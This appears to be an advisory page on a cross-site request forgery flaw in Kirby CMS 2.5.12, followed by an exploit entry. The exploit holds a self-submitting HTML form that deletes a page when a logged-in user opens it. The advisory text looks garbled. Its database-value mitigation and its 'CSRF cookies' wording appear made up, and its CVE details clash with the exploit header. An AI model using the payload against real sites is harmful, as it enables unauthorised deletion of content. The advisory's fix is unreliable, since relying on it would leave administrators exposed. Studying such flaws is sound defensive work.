The vulnerability can be exploited by remote attackers via CSRF cookies. The security issue affects all users using the delete pages functionality.
CVE Solution - Update Pending release of a patch for Kirby 2.5.12, the community recommended users to change the default `delete_page_cb` value from ` DELETE_PAGE ` to ` UPDATE_PAGE_CB ` for security reasons. The community also recommended the users to modify the `delete_page_cb` value by changing it from ` DELETE_PAGE ` to ` UPDATE_PAGE_CB ` in the database.
References:
- Kirby 2.5.12 Release Notes: https://github.com/KirbyProject/kirby2/releases/tag/v2.5.12
- CVE-2018-14519 Symptom: http://cve-database.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14519
Summary
The vulnerability affects all users using the delete pages functionality and can be exploited by remote attackers via CSRF cookies. This security issue can be fixed by updating the Kirby 2.5.12 or by changing the default `delete_page_cb` value to ` UPDATE_PAGE_CB ` in database to mitigate this issue.
Exploit
# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Request Forgery (Delete Page)
# Date: 2018-07-22
# Exploit Author: Zaran Shaikh
# Version: 2.5.12
# CVE: NA
# Category: Web Application
# 1. Description
# The application allows malicious HTTP requests to be sent in order to
# trick a user into adding/ deleting web pages.
# 2. Proof of Concept
1. Visit the application
2. Go to add page option
3. Create a crafted HTTP page with delete/ add option and host it on
a server. Upon sending the link to a user and upon click, it gets triggered
and the page is added/deleted
4. Payload:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">
<input type="hidden" name="_redirect" value="site/subpages" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>Timeline
Published on: 08/24/2022 20:15:00 UTC
Last modified on: 08/29/2022 02:41:00 UTC